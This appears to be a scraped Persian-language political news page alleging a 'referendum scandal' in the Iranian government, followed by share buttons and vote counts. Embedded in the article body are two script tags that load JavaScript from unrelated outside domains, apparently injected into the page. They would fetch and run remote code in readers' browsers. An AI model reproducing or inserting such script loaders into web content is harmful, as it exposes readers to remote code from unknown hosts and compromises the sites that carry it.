افتضاح فکت شیت و حالا رسوایی رفراندوم در دولت تدبیر و امید


<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script>لطفا تا میتوانید نشر دهید! بعد از رسوایی فکت شیت، این دومین رسوایی دولت در سال جدید است. دولتی که از رفراندوم همچون اهرم فشار استفاده میکرد ولی اکنون رسوا شده...<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>


+ 
28

- 
0

عرض x طول

دکمه اشتراک گذاري تلگرام ارسال ويدئو در تلگرام

ارسال نظر
نظرات
(برای مشاهده نظرات کلیک کنید)